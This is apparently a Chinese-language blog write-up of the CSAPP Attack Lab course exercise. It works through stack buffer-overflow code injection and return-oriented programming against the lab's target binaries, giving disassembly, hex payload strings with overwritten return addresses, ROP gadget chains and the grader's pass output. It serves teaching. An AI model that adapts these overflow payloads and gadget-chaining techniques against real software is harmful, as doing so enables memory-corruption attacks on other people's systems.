Leafing_
Leafing_

[笔记]计算机基础 4 CSAPP Lab3-AttackLab

BombLabs是CSAPP的第二个Lab,主要考察的是对于栈、返回机制的理解,和非常微不足道的汇编编写能力。
AttackLab做起来大概需要一天半,主要是一开始有点看不懂题目的意思,理解了之后倒是好说。
CTarget确实比Rtarget要好攻击很多,这也确实印证了栈随机化和栈内不可执行所带来的保护能力。

文章目录

  • Lab
    • 代码注入攻击Code Injection Attacks
      • Level 1
      • Level 2
        • 思路一 callq->touch2
        • 思路二 retq传递控制
      • Level 3
    • 面向返回的编程Return-Oriented Programming(ROP)
      • Level 4
      • Level 5
  • 总结

Lab

代码注入攻击Code Injection Attacks

这个部分所需要攻击的程序ctarget所具有的特点是栈位置固定,即使堆栈位置从一次运行到下一次运行保持一致,因此可以将堆栈上的数据视为可执行代码。
因此,利用Gets函数对栈进行覆盖,就可以轻易地注入代码。

Level 1

Level1要求我们执行touch1函数,甚至不需要注入代码。
直接查看test、getbuf和touch1的汇编。

0000000000401968 <test>:
  401968:	48 83 ec 08          	sub    $0x8,%rsp
  40196c:	b8 00 00 00 00       	mov    $0x0,%eax
  401971:	e8 32 fe ff ff       	callq  4017a8 <getbuf>
  401976:	89 c2                	mov    %eax,%edx
  401978:	be 88 31 40 00       	mov    $0x403188,%esi
  40197d:	bf 01 00 00 00       	mov    $0x1,%edi
  401982:	b8 00 00 00 00       	mov    $0x0,%eax
  401987:	e8 64 f4 ff ff       	callq  400df0 <__printf_chk@plt>
  40198c:	48 83 c4 08          	add    $0x8,%rsp
  401990:	c3                   	retq   
  401991:	90                   	nop
  401992:	90                   	nop
  401993:	90                   	nop
  401994:	90                   	nop
  401995:	90                   	nop
  401996:	90                   	nop
  401997:	90                   	nop
  401998:	90                   	nop
  401999:	90                   	nop
  40199a:	90                   	nop
  40199b:	90                   	nop
  40199c:	90                   	nop
  40199d:	90                   	nop
  40199e:	90                   	nop
  40199f:	90                   	nop

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq   
  4017be:	90                   	nop
  4017bf:	90                   	nop

00000000004017c0 <touch1>:
  4017c0:	48 83 ec 08          	sub    $0x8,%rsp
  4017c4:	c7 05 0e 2d 20 00 01 	movl   $0x1,0x202d0e(%rip)        # 6044dc 
  4017cb:	00 00 00 
  4017ce:	bf c5 30 40 00       	mov    $0x4030c5,%edi
  4017d3:	e8 e8 f4 ff ff       	callq  400cc0 <puts@plt>
  4017d8:	bf 01 00 00 00       	mov    $0x1,%edi
  4017dd:	e8 ab 04 00 00       	callq  401c8d <validate>
  4017e2:	bf 00 00 00 00       	mov    $0x0,%edi
  4017e7:	e8 54 f6 ff ff       	callq  400e40 <exit@plt>

从中可以看到,从test->getbuf的ret之前,一共分配了56个字节的栈空间,其中getbuf申请了40个字节,而4017bc所申请返回的地址为401978,这个地址被保存在41-48个字节之中,即栈内 %rsp + 40 - %rsp + 47之中,因此我们必须利用Getf覆写这个内存,从而使得4017bc返回我们所希望执行的代码的位置。

touch1的地址为4017c0,因为小端法,地位低地址,所以应该按照c0 17 40 00 00 00 00 00进行填写。那么应该注入的字符串就很简单了,利用hex2raw,我们应该注入的字符串的hex表示应为(前40字节无所谓):

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00  <-覆写返回地址

通过Level1

usr@ub2004:~/csapplab/attacklab/target1$ ./hex2raw < c1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

Level 2

Level2要求我们将cookie作为参数,执行touch2函数。
相比于第一题单纯的调用touch1,这一题关键在于传递cookie,这里的cookie是作为unsigned int进行传递,所以还好。
首先还是来关注touch2的地址,因为需要类似Level1,之后必然需要调用这个地址。

00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc 
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	callq  400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	callq  401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	callq  400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	callq  401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	callq  400e40 <exit@plt>

好的,现在记住touch2的地址为4017ec
我们开始思考所需要注入的代码,有以下两个思路。

思路一 callq->touch2

利用callq调用touch2,那么思路就很简单。

  1. 将调用touch2的代码注入栈区
  2. 覆盖返回地址为栈顶,从而retq会执行我们所注入的代码

利用gcc和objdump得到所需要的具体汇编:

0000000000000000 <.text>:
   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi   #cookie作为参数
   7:	68 ec 17 40 00       	pushq  $0x4017ec          #touch2的地址
   c:	ff 14 24             	callq  *(%rsp)            #调用touch2
   f:	c3                   	retq

接下来我们利用gdb,获得getbuf的栈顶指针,通过查看%rsp可以知道,栈顶地址为0x5561dc78,也是覆写retq返回地址所需要的字符串(注意小端法)。
那么具体的字符串如下,需要注意的是代码是从上到下执行的(地址低->高):

48 c7 c7 fa 97 b9 59 68
ec 17 40 00 ff 14 24 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00

思路二 retq传递控制

因为pdf不建议使用callq,实际上也可以利用retq来传递控制。

  1. 将touch2的地址压入栈中(pushq)
  2. retq会执行栈指针指向的程序,并且 %rsp = %rsp-8

汇编如下:

0000000000000000 <.text>:
   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
   7:	68 ec 17 40 00       	pushq  $0x4017ec
   c:	c3                   	retq

字符串如下:

48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 DC 61 55 00 00 00 00

注入,成功通过。

usr@ub2004:~/csapplab/attacklab/target1$ ./hex2raw < c2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

Level 3

Level3和Level2唯一的不同在于,所传递的不再是一个unsigned int,而是一个指针,这意味着无法使用常数mov %rdi作为参数,必须将cookie存入栈中,并且设置%rdi为地址
有以下两个细节需要注意:

  1. 调用hexmatch和strcmp时,会利用,所以我们应该将cookie存在不被覆写的区域
  2. 字符串应该以’\0’作为结尾

注意以上细节后,我们还是查看汇编,得到touch3的地址为4018fa
理清楚思路后,我们应该明白,这次一共需要注入至少57个字节,即代码+getbuf栈内空余的40个字节 + 返回地址的8个字节 + cookie的9个字节
那么cookie所在的地址应为寄存器%rsp + 48,即0x5561dca8
那么代码也类似Level2,有callq和retq两种控制转移思路。

#callq
0000000000000000 <.text>:
   0:	48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi
   7:	68 fa 18 40 00       	pushq  $0x4018fa
   c:	ff 14 24             	callq  *(%rsp)
   f:	c3                   	retq

#retq
0000000000000000 <.text>:
   0:	48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi
   7:	68 fa 18 40 00       	pushq  $0x4018fa
   c:	c3                   	retq

相对应的字符串分别为

#callq
48 c7 c7 a8 dc 61 55 68 
fa 18 40 00 ff 14 24 c3 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
78 dc 61 55 00 00 00 00 
35 39 62 39 39 37 66 61  <-cookie的字符串
00

#retq
48 c7 c7 a8 dc 61 55 68 
fa 18 40 00 c3 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
78 dc 61 55 00 00 00 00 
35 39 62 39 39 37 66 61 <-cookie的字符串
00

注入,通过。

usr@ub2004:~/csapplab/attacklab/target1$ ./hex2raw < c3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00

面向返回的编程Return-Oriented Programming(ROP)

这个部分所需要攻击的程序rtarget比ctarget顽强很多,因为采用了两种技术来抵抗攻击

  • 它使用随机化,以便堆栈位置从一次运行到另一次运行不同。 这使得无法确定注入的代码所在的位置。
  • 它将保存堆栈的内存部分标记为不可执行,因此即使您可以将程序计数器设置为注入代码的开头,程序也会因分段错误而失败。

所以,ROP必须利用已有的可执行程序来执行任务。具体来说,就是通过指令的字节序列,通过指定不同的起始位置,从而歪曲指令本来的意义,从而执行我们所需要的指令

Level 4

Level4要求我们对rtarget再做一次Level2所做的事,调用touch2。
由于无法直接指定执行的代码,所以我们只能从已有的farm区域来找自己所需要的部分。

0000000000401994 <start_farm>:
  401994:	b8 01 00 00 00       	mov    $0x1,%eax
  401999:	c3                   	retq   

000000000040199a <getval_142>:
  40199a:	b8 fb 78 90 90       	mov    $0x909078fb,%eax
  40199f:	c3                   	retq   

00000000004019a0 <addval_273>:
  4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  4019a6:	c3                   	retq   

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3                   	retq   

00000000004019ae <setval_237>:
  4019ae:	c7 07 48 89 c7 c7    	movl   $0xc7c78948,(%rdi)
  4019b4:	c3                   	retq   

00000000004019b5 <setval_424>:
  4019b5:	c7 07 54 c2 58 92    	movl   $0x9258c254,(%rdi)
  4019bb:	c3                   	retq   

00000000004019bc <setval_470>:
  4019bc:	c7 07 63 48 8d c7    	movl   $0xc78d4863,(%rdi)
  4019c2:	c3                   	retq   

00000000004019c3 <setval_426>:
  4019c3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
  4019c9:	c3                   	retq   

00000000004019ca <getval_280>:
  4019ca:	b8 29 58 90 c3       	mov    $0xc3905829,%eax
  4019cf:	c3                   	retq   

00000000004019d0 <mid_farm>:
  4019d0:	b8 01 00 00 00       	mov    $0x1,%eax
  4019d5:	c3                   	retq

我们注意到4019ca: b8 29 58 90 c3,并且从40199cc开始读,即为58 90 c3,其中58可以被视为popq %rax,90被视为nop,c3为retq,那么我们就可以将cookie存在栈中,利用popq保存到%rax之中。,并且由于popq和retq,从而程序会接下来执行原先的%rsp + 16的位置所保存的地址,我们就可以在%rsp+8 - %rsp+15之间保存cookie
接下来在4019a0: 8d 87 48 89 c7 c3中,从4019a2开始读,即为48 89 c7 c3,对应为movq %rax, %rdi 与 retq,从而将cookie从%rax转移到了所需的%rdi,并且执行%rsp+8所指向的程序,就可以将这个位置设置为touch2。具体的字符串如下:

00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
cc 19 40 00 00 00 00 00  <- popq %rax + retq的程序地址
fa 97 b9 59 00 00 00 00  <- cookie
a2 19 40 00 00 00 00 00  <- movq %rax,%rdi + retq的程序地址
ec 17 40 00 00 00 00 00  <- touch2的程序地址

通过。

usr@ub2004:~/csapplab/attacklab/target1$ ./hex2raw < r1.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Level 5

Level5要求我们对rtarget再做一次Level3所做的事,调用touch3。
此时单纯使用popq和movq是不够了,因此必须使用farm中仅有一个可用的lea指令4019d6: lea (%rdi,%rsi,1),%rax

0000000000401994 <start_farm>:
  401994:	b8 01 00 00 00       	mov    $0x1,%eax
  401999:	c3                   	retq   

000000000040199a <getval_142>:
  40199a:	b8 fb 78 90 90       	mov    $0x909078fb,%eax
  40199f:	c3                   	retq   

00000000004019a0 <addval_273>:
  4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  4019a6:	c3                   	retq   

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3                   	retq   

00000000004019ae <setval_237>:
  4019ae:	c7 07 48 89 c7 c7    	movl   $0xc7c78948,(%rdi)
  4019b4:	c3                   	retq   

00000000004019b5 <setval_424>:
  4019b5:	c7 07 54 c2 58 92    	movl   $0x9258c254,(%rdi)
  4019bb:	c3                   	retq   

00000000004019bc <setval_470>:
  4019bc:	c7 07 63 48 8d c7    	movl   $0xc78d4863,(%rdi)
  4019c2:	c3                   	retq   

00000000004019c3 <setval_426>:
  4019c3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
  4019c9:	c3                   	retq   

00000000004019ca <getval_280>:
  4019ca:	b8 29 58 90 c3       	mov    $0xc3905829,%eax
  4019cf:	c3                   	retq   

00000000004019d0 <mid_farm>:
  4019d0:	b8 01 00 00 00       	mov    $0x1,%eax
  4019d5:	c3                   	retq   

00000000004019d6 <add_xy>:
  4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
  4019da:	c3                   	retq   

00000000004019db <getval_481>:
  4019db:	b8 5c 89 c2 90       	mov    $0x90c2895c,%eax
  4019e0:	c3                   	retq   

00000000004019e1 <setval_296>:
  4019e1:	c7 07 99 d1 90 90    	movl   $0x9090d199,(%rdi)
  4019e7:	c3                   	retq   

00000000004019e8 <addval_113>:
  4019e8:	8d 87 89 ce 78 c9    	lea    -0x36873177(%rdi),%eax
  4019ee:	c3                   	retq   

00000000004019ef <addval_490>:
  4019ef:	8d 87 8d d1 20 db    	lea    -0x24df2e73(%rdi),%eax
  4019f5:	c3                   	retq   

00000000004019f6 <getval_226>:
  4019f6:	b8 89 d1 48 c0       	mov    $0xc048d189,%eax
  4019fb:	c3                   	retq   

00000000004019fc <setval_384>:
  4019fc:	c7 07 81 d1 84 c0    	movl   $0xc084d181,(%rdi)
  401a02:	c3                   	retq   

0000000000401a03 <addval_190>:
  401a03:	8d 87 41 48 89 e0    	lea    -0x1f76b7bf(%rdi),%eax
  401a09:	c3                   	retq   

0000000000401a0a <setval_276>:
  401a0a:	c7 07 88 c2 08 c9    	movl   $0xc908c288,(%rdi)
  401a10:	c3                   	retq   

0000000000401a11 <addval_436>:
  401a11:	8d 87 89 ce 90 90    	lea    -0x6f6f3177(%rdi),%eax
  401a17:	c3                   	retq   

0000000000401a18 <getval_345>:
  401a18:	b8 48 89 e0 c1       	mov    $0xc1e08948,%eax
  401a1d:	c3                   	retq   

0000000000401a1e <addval_479>:
  401a1e:	8d 87 89 c2 00 c9    	lea    -0x36ff3d77(%rdi),%eax
  401a24:	c3                   	retq   

0000000000401a25 <addval_187>:
  401a25:	8d 87 89 ce 38 c0    	lea    -0x3fc73177(%rdi),%eax
  401a2b:	c3                   	retq   

0000000000401a2c <setval_248>:
  401a2c:	c7 07 81 ce 08 db    	movl   $0xdb08ce81,(%rdi)
  401a32:	c3                   	retq   

0000000000401a33 <getval_159>:
  401a33:	b8 89 d1 38 c9       	mov    $0xc938d189,%eax
  401a38:	c3                   	retq   

0000000000401a39 <addval_110>:
  401a39:	8d 87 c8 89 e0 c3    	lea    -0x3c1f7638(%rdi),%eax
  401a3f:	c3                   	retq   

0000000000401a40 <addval_487>:
  401a40:	8d 87 89 c2 84 c0    	lea    -0x3f7b3d77(%rdi),%eax
  401a46:	c3                   	retq   

0000000000401a47 <addval_201>:
  401a47:	8d 87 48 89 e0 c7    	lea    -0x381f76b8(%rdi),%eax
  401a4d:	c3                   	retq   

0000000000401a4e <getval_272>:
  401a4e:	b8 99 d1 08 d2       	mov    $0xd208d199,%eax
  401a53:	c3                   	retq   

0000000000401a54 <getval_155>:
  401a54:	b8 89 c2 c4 c9       	mov    $0xc9c4c289,%eax
  401a59:	c3                   	retq   

0000000000401a5a <setval_299>:
  401a5a:	c7 07 48 89 e0 91    	movl   $0x91e08948,(%rdi)
  401a60:	c3                   	retq   

0000000000401a61 <addval_404>:
  401a61:	8d 87 89 ce 92 c3    	lea    -0x3c6d3177(%rdi),%eax
  401a67:	c3                   	retq   

0000000000401a68 <getval_311>:
  401a68:	b8 89 d1 08 db       	mov    $0xdb08d189,%eax
  401a6d:	c3                   	retq   

0000000000401a6e <setval_167>:
  401a6e:	c7 07 89 d1 91 c3    	movl   $0xc391d189,(%rdi)
  401a74:	c3                   	retq   

0000000000401a75 <setval_328>:
  401a75:	c7 07 81 c2 38 d2    	movl   $0xd238c281,(%rdi)
  401a7b:	c3                   	retq   

0000000000401a7c <setval_450>:
  401a7c:	c7 07 09 ce 08 c9    	movl   $0xc908ce09,(%rdi)
  401a82:	c3                   	retq   

0000000000401a83 <addval_358>:
  401a83:	8d 87 08 89 e0 90    	lea    -0x6f1f76f8(%rdi),%eax
  401a89:	c3                   	retq   

0000000000401a8a <addval_124>:
  401a8a:	8d 87 89 c2 c7 3c    	lea    0x3cc7c289(%rdi),%eax
  401a90:	c3                   	retq   

0000000000401a91 <getval_169>:
  401a91:	b8 88 ce 20 c0       	mov    $0xc020ce88,%eax
  401a96:	c3                   	retq   

0000000000401a97 <setval_181>:
  401a97:	c7 07 48 89 e0 c2    	movl   $0xc2e08948,(%rdi)
  401a9d:	c3                   	retq   

0000000000401a9e <addval_184>:
  401a9e:	8d 87 89 c2 60 d2    	lea    -0x2d9f3d77(%rdi),%eax
  401aa4:	c3                   	retq   

0000000000401aa5 <getval_472>:
  401aa5:	b8 8d ce 20 d2       	mov    $0xd220ce8d,%eax
  401aaa:	c3                   	retq   

0000000000401aab <setval_350>:
  401aab:	c7 07 48 89 e0 90    	movl   $0x90e08948,(%rdi)
  401ab1:	c3                   	retq   

0000000000401ab2 <end_farm>:
  401ab2:	b8 01 00 00 00       	mov    $0x1,%eax
  401ab7:	c3                   	retq   
  401ab8:	90                   	nop
  401ab9:	90                   	nop
  401aba:	90                   	nop
  401abb:	90                   	nop
  401abc:	90                   	nop
  401abd:	90                   	nop
  401abe:	90                   	nop
  401abf:	90                   	nop

从farm中我们可以获得以下重要指令,与其对应的地址:

  • 4019ab: popq %rax + retq
  • 401a42: movd %eax,%edx + nop + retq
  • 401a34: movd %edx,%ecx + nop +retq
  • 401a13: movd %ecx,%esi + nop + nop + retq
  • 401a06: movq %rsp,%rax + retq
  • 4019a2: movq %rax,%rdi + retq
  • 4019d6: lea (%rdi,%rsi,1),%rax + retq

由上述指令我们做到:

  • 将栈内常量movd到%rax
  • 利用%edx,%ecx作为跳板,将常量转移到%esi
  • 将栈指针%rsp转移到%rax中,并利用lea指令对%rax进行偏移,使其指向cookie地址

因此,理清楚了思路后,字符串也就不难写了。

00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00   <-popq %rax + retq
20 00 00 00 00 00 00 00   <-32 offset
42 1a 40 00 00 00 00 00   <-movd %eax,%edx + nop + retq
34 1a 40 00 00 00 00 00   <-movd %edx,%ecx + nop + retq
13 1a 40 00 00 00 00 00   <-movd %ecx,%esi + nop + nop + retq
06 1a 40 00 00 00 00 00   <-movq %rsp,%rax + retq
a2 19 40 00 00 00 00 00   <-movq %rax,%rdi + retq
d6 19 40 00 00 00 00 00   <-lea (%rdi,%rsi,1),%rax + retq
a2 19 40 00 00 00 00 00   <-movq %rax,%rdi + retq
fa 18 40 00 00 00 00 00   <-touch3
35 39 62 39 39 37 66 61   <-cookie
00                        <-'\0'

通过。

usr@ub2004:~/csapplab/attacklab/target1$ ./hex2raw < r2.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AB 19 40 00 00 00 00 00 20 00 00 00 00 00 00 00 42 1A 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00

总结

想说的貌似都在BombLab里说了,只能鼓励自己继续读第4章了。
——2023.4.6

你可能感兴趣的:(计算机,ics,csapp,attacklab,计算机基础)

  • 1.计算机处理器架构+嵌入式处理器架构及知识 vv 啊 arm-linux学习linux系统架构
    目录一:x86-64处理器架构二:Intel80386处理器(i386)1.i3862.i686三:嵌入式Linux知识:1.MinGW2.GNU计划2.1GNU工具链概述此次只分享英特尔和ADM处理器有关于x86的架构,至于嵌入式处理器架构请查看https://en.wikipedia.org/wiki/List_of_ARM_processors一:x86-64处理器架构x86-64,也称为x
  • 【计算机网络】第 3 问:电路交换、报文交换、分组交换之间的区别? 孤独打铁匠Julian #计算机408考研面试计算机网络计算机网络网络
    电路交换、报文交换、分组交换之间的区别?省流图详解电路交换电路交换的优点电路交换的缺点建立连接时间长的原因报文交换报文交换的优点报文交换的缺点分组交换分组交换的优点分组交换的缺点比较总结省流图详解电路交换在进行数据传输前,两个结点之间必须先建立一条专用(双方独占)的物理通信路径(由通信双方之间的交换设备和链路逐段连接而成),该路径可能经过许多中间结点。这一路径在整个数据传输期间一直被独占,直到通信
  • 通俗易懂:什么是Java虚拟机(JVM)?它的主要作用是什么? 大龄下岗程序员 mysqljavamysqlspring
    Java虚拟机(JavaVirtualMachine,JVM)是一种软件实现的抽象计算机,它负责执行Java字节码(Bytecode)。Java程序并不是直接在物理计算机上运行,而是先由Java编译器将源代码编译成与平台无关的字节码,然后由JVM负责读取字节码并在实际硬件架构上运行。JVM的主要作用包括以下几个方面:1.跨平台性-JVM是Java语言“一次编写,到处运行”(WriteOnce,Ru
  • 计算机网络知识点汇总 蓝小俊
    第1章概述P36习题3、7、14、15、17、22、24、262.“协议”与“服务”的异同点?答:(1)协议是控制两个对等实体进行通信的规则的集合。在协议的控制下,两个对等实体间的通信使得本层能够向上一层提供服务,而要实现本层协议,还需要使用下面一层提供服务。(2)协议和服务的概念的区分:1、协议的实现保证了能够向上一层提供服务。本层的服务用户只能看见服务而无法看见下面的协议。下面的协议对上面的服
  • Java学习笔记01 .wsy. 日常java学习笔记
    1.1Java简介Java的前身是Oak,詹姆斯·高斯林是java之父。1.2Java体系Java是一种与平台无关的语言,其源代码可以被编译成一种结构中立的中间文件(.class,字节码文件)于Java虚拟机上运行。1.2.3专有名词JDK提供编译、运行Java程序所需要的种种工具及资源。JRE是运行Java所依赖的环境的集合。JVM是一个虚构出来的计算机,通过在实际的计算机上仿真模拟各种计算机功
  • 计算机常用端口号 王依硕 linux服务器ssh
    ftp:(20端口)用于ftp服务,用于数据传输。ftp:(21端口)用于文件上传和下载。ssh:(22端口)用于安全Shell访问和文件传输。telnet:(23端口)用于远程命令行计算机管理。smtp:(25端口)用于发送电子邮件。dns:(53端口)用于域名解析。dhcp:(67和68端口)用于动态分配IP地址和配置网络参数。tftp:(69端口)使用udp连接。finger:(79端口)是
  • P5635 【CSGRound1】天下第一 golemon. 算法题算法数据结构c++
    P5635【CSGRound1】天下第一-洛谷|计算机科学教育新生态(luogu.com.cn)思路:记忆化搜索,因为模数ppp对于多组输入来说是不变的,那么(x+y)(x+y)%p==0(x+y)这个判定条件在整个程序中都是正确的。题目中,每两个回合是一轮-两人都执行一次。为了让代码好写,每次搜索时是按照一轮来搜索。f[x][y]!=0f[x][y]!=0f[x][y]!=0:之前搜索时已经得到
  • pdu电源线_pdu电源插座与普通电源插座的区别 夹心酱紫 pdu电源线
    描述pdu电源插座与普通电源插座的区别1、两者的功能不同普通插座只具备供电过载保护和总控开关的功能,而PDU不仅有供电过载保护和总控开关,还具备防雷抗冲电压、防静电防火等功能。2、两者的材料不同普通插座采用的是塑料材质,而PDU电源插座采用的是金属材质,具有防静电的作用。3、两者的应用领域不同普通插座一般应用于家庭或办公室,为计算机等电器提供电源,而PDU插座电源一般应用于数据中心、网络系统和工业
  • 如果你认为TIA博途静静还是一款工程平台软件的话... 佳途自动化学院小佳老师
    近日,在西门子举办的西门子行业大型论坛上,小佳听到了以下对话:A:你听说过西门子TIAbotu软件吗?小B:你说的是西门子全集成自动化工程软件吗?每个来参加论坛的人都知道这一点。小c:一点点但是,作为果你认为TIA-botu只是一个软件工程平台,那么你就可以退出了!作为如果您关注西门子,在许多应用程序站点中,您可以看到TIABroadway经常在工程师的计算机屏幕上闪烁。这套自动化软件,在业内率先
  • Windows Edge 兼容性问题修复 马卫斌 前端工程师 edge
    当遇到MicrosoftEdge浏览器的兼容性问题时,您可以尝试以下几种解决方案:解决方案1:通过注册表编辑器禁用渲染器完整性检查针对一些特定情况,您可能需要关闭Edge浏览器的渲染器完整性检查以解决兼容性问题。按照以下步骤操作:1.按Win+R键打开“运行”对话框,输入regedit并回车打开注册表编辑器。2.导航至以下路径:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Pol
  • OpenCV(一个C++人工智能领域重要开源基础库) 简介 愚梦者 OpenCV人工智能人工智能opencvc++图像处理计算机视觉开源
    返回:OpenCV系列文章目录(持续更新中......)上一篇:OpenCV4.9.0配置选项参考下一篇:OpenCV4.9.0开源计算机视觉库安装概述引言:OpenCV(全称OpenSourceComputerVisionLibrary)是一个基于开放源代码发行的跨平台计算机视觉库,可以用来进行图像处理、计算机视觉和机器学习等领域的开发。该库由英特尔公司于1999年开始开发,最初是为了加速处理器
  • 408-计算机组成原理-注意点 猫毛已经快要掉光的小猫 系统架构
    数据的表示IEEE754标准的特殊情况:阶码全为0,尾数不全为0表示非规格化的数值,0.M×2^(-126)阶码全为0,尾数也全为0,表示±0阶码全为1,尾数全为0,表示正负无穷大阶码全为1,尾数不全为0,表示非数符Nan存储器Cache:多少组相联指的是一组有多少个。LRU标记为一组有n个,就需要用logn表示区分计算cache数据区与cache容量,cache容量需要包括标志位。标志位大体包括
  • 计算机网络复试总结(五) interee 面试计算机网络
    可能会问:基础知识问题:请简述TCP/IP协议栈的层次结构及其功能。TCP/IP协议栈的层次结构及其功能可以简要概述如下:层次结构:TCP/IP协议栈通常被划分为四个主要层次,从底层到高层分别是网络接口层(也称为链路层或数据链路层)、网络层(也称为网际网层)、传输层和应用层。这四个层次协同工作,实现数据的封装、传输和解析,从而完成网络通信任务。功能概述:网络接口层:这是TCP/IP协议栈的最底层,
  • “异步”是什么意思? 小林想被监督学习 系统架构设计师面试计算机基础java开发语言
    含义“异步”在计算机科学中,指的是一种操作模式,其中操作被发起后,不必等待该操作完成,可以继续执行其他任务。也就是说异步操作不会去阻塞后续代码的执行,当操作完成时,通常会通过回调函数、事件或其他机制来通知应用程序。例子例如在事件驱动架构风格中,异步通信是核心特性之一。事件的生产者(发布者)发布了事件以后,不会等待任何消费者(订阅者)的响应,继续执行后续的任务。消费者感知到事件触发了以后,就自己安排
  • 基于SSM+Vue企业销售培训系统 企业人才培训系统 企业课程培训管理系统 企业文化培训班系统Java 计算机程序老哥
